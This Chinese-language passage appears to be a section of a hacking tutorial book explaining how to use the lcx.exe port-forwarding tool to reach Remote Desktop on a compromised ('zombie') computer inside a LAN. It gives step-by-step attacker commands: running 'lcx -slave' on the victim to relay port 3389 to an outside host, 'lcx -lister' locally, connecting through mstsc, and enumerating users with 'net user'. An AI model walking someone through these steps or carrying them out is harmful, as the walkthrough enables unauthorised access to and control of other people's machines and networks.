1.4 LCX端口轉發(fā)實現(xiàn)內網突破

在理論上只要網絡連接的計算機都是可以訪問的，但是在實際中往往由于技術水平等原因很難實現(xiàn)它。例如，局域網中的某臺計算機僅僅開放了Web服務，該服務僅能供內網用戶使用，而外網用戶根本沒有辦法直接訪問。因此要想讓外網用戶能夠訪問局域網中的系統(tǒng)服務，必須進行端口映射等操作才行。端口映射在入侵內網的時候經常用到，特別是要登錄遠程終端服務時，使用端口映射就非常方便。

Lcx.exe是一個端口轉發(fā)工具，相當于把肉雞A上的3389端口轉發(fā)到具有外網IP地址的B機上，這樣連接B機的3389端口就相當于連接A機的3389端口。Lcx程序多用于被控制計算機（肉雞）處于內網的情況，被控制機可能中了木馬程序，雖然能夠進行控制，但還是沒有使用遠程終端登錄到本機進行管理方便。因此在很多情況下，都會想方設法在被控制計算機上開啟3389端口，然后通過lcx等程序進行端口轉發(fā)，進而在本地連接到被控制計算機的遠程終端并進行管理和使用。

1.4.1 確定被控制計算機的IP地址

在被控制計算機上開啟遠程終端，然后執(zhí)行“ipconfig /all”命令，查看其網絡配置情況，如圖1-31所示，該計算機的IP地址為“192.168.80.129”。

1.4.2 在被控制計算機上執(zhí)行端口轉發(fā)命令

在被控制計算機上執(zhí)行“l(fā)cx -slave 218.69.*.* 51 192.168.80.129 3389”，如圖1-32所示，執(zhí)行完畢后會給出一些提示，如果顯示為“Make a Connection to 218.69.*.*:51”則表示端口轉發(fā)正確。

1.4.3 在本機上執(zhí)行監(jiān)聽命令

在本機上打開DOS命令窗口，然后到lcx.exe程序所在路徑執(zhí)行“l(fā)cx -lister 51 3389”命令，監(jiān)聽51端口，監(jiān)聽成功后，會顯示如圖1-33所示的數(shù)據(jù)。

1.4.4 在本機使用遠程終端進行登錄

在DOS提示符下輸入“mstsc”命令打開遠程終端連接器，輸入“127.0.0.1”后單擊“連接”按鈕進行遠程終端連接，在出現(xiàn)登錄界面后分別收入用戶名和密碼，驗證通過后，即可遠程進入被控制計算機的桌面，如圖1-35所示，輸入“ipconfig /all”以及“net user”命令來查看網絡配置情況以及用戶信息。

1.4.5 查看本地連接

在被控制計算機上使用“netstat-an”查看當前所有的連接時，可以看到被控制計算機是在跟自己進行遠程終端連接，如圖1-36所示，而實際的3389端口是跟本機的51端口進行連接的。